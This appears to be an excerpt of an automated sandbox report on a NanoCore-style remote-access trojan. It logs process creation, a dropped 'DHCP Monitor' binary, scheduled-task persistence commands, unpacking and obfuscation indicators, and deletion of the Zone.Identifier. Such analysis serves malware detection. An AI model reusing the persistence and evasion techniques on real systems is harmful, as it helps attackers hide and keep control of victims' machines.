        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\Desktop\bGf2H3tXGg.exe C:\Users\user\Desktop\bGf2H3tXGg.exe 0
        Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess created: C:\Users\user\Desktop\bGf2H3tXGg.exe C:\Users\user\Desktop\bGf2H3tXGg.exe 0
        Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess created: C:\Users\user\Desktop\bGf2H3tXGg.exe 'C:\Users\user\Desktop\bGf2H3tXGg.exe' Jump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpDE28.tmp'Jump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpE0E8.tmp'Jump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess created: C:\Users\user\Desktop\bGf2H3tXGg.exe C:\Users\user\Desktop\bGf2H3tXGg.exe 0Jump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0Jump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' Jump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: bGf2H3tXGg.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: wntdll.pdbUGP source: bGf2H3tXGg.exe, 00000000.00000003.242145777.0000000002A00000.00000004.00000001.sdmp, bGf2H3tXGg.exe, 0000000B.00000003.300129419.0000000002A50000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000003.294879939.0000000002900000.00000004.00000001.sdmp, dhcpmon.exe, 0000000F.00000003.316493535.0000000002A50000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdb source: bGf2H3tXGg.exe, 00000000.00000003.242145777.0000000002A00000.00000004.00000001.sdmp, bGf2H3tXGg.exe, 0000000B.00000003.300129419.0000000002A50000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000003.294879939.0000000002900000.00000004.00000001.sdmp, dhcpmon.exe, 0000000F.00000003.316493535.0000000002A50000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: bGf2H3tXGg.exe, 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmp
        Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmp
        Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: bGf2H3tXGg.exe, 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmp

        Data Obfuscation:

        barindex
        Detected unpacking (changes PE section rights)Show sources
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeUnpacked PE file: 3.2.bGf2H3tXGg.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R;.reloc:R;
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeUnpacked PE file: 14.2.bGf2H3tXGg.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R;.reloc:R;
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 17.2.dhcpmon.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R;.reloc:R;
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 22.2.dhcpmon.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R;.reloc:R;
        Detected unpacking (creates a PE file in dynamic memory)Show sources
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 22.2.dhcpmon.exe.2430000.4.unpack
        Detected unpacking (overwrites its own PE header)Show sources
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeUnpacked PE file: 3.2.bGf2H3tXGg.exe.400000.1.unpack
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeUnpacked PE file: 14.2.bGf2H3tXGg.exe.400000.0.unpack
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 17.2.dhcpmon.exe.400000.1.unpack
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 22.2.dhcpmon.exe.400000.1.unpack
        .NET source code contains potential unpackerShow sources
        Source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 17.2.dhcpmon.exe.4a60000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 17.2.dhcpmon.exe.4a60000.10.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 22.2.dhcpmon.exe.2430000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 22.2.dhcpmon.exe.2430000.4.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 3_2_00401F16 push ecx; ret 3_2_00401F29
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 3_1_00401F16 push ecx; ret 3_1_00401F29
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 14_2_00401F16 push ecx; ret 14_2_00401F29
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 14_2_051B7648 push eax; iretd 14_2_051B7649
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 14_2_05276E55 push FFFFFF8Bh; iretd 14_2_05276E57
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 14_1_00401F16 push ecx; ret 14_1_00401F29
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 17_2_00401F16 push ecx; ret 17_2_00401F29
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 17_2_051B7648 push eax; iretd 17_2_051B7649
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 17_2_05396E55 push FFFFFF8Bh; iretd 17_2_05396E57
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 17_1_00401F16 push ecx; ret 17_1_00401F29
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_00401F16 push ecx; ret 22_2_00401F29
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_04FB7648 push eax; iretd 22_2_04FB7649
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_05256E55 push FFFFFF8Bh; iretd 22_2_05256E57
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_1_00401F16 push ecx; ret 22_1_00401F29
        Source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 17.2.dhcpmon.exe.4a60000.10.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 17.2.dhcpmon.exe.4a60000.10.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 22.2.dhcpmon.exe.2430000.4.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 22.2.dhcpmon.exe.2430000.4.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeFile created: C:\Users\user\AppData\Local\Temp\nsfEFEC.tmp\xktfu.dllJump to dropped file
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeFile created: C:\Users\user\AppData\Local\Temp\nsmE619.tmp\xktfu.dllJump to dropped file
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeFile created: C:\Users\user\AppData\Local\Temp\nsp1382.tmp\xktfu.dllJump to dropped file
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeFile created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJump to dropped file
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeFile created: C:\Users\user\AppData\Local\Temp\nsh9AB8.tmp\xktfu.dllJump to dropped file

        Boot Survival:

        barindex
        Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpDE28.tmp'

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeFile opened: C:\Users\user\Desktop\bGf2H3tXGg.exe:Zone.Identifier read attributes | deleteJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
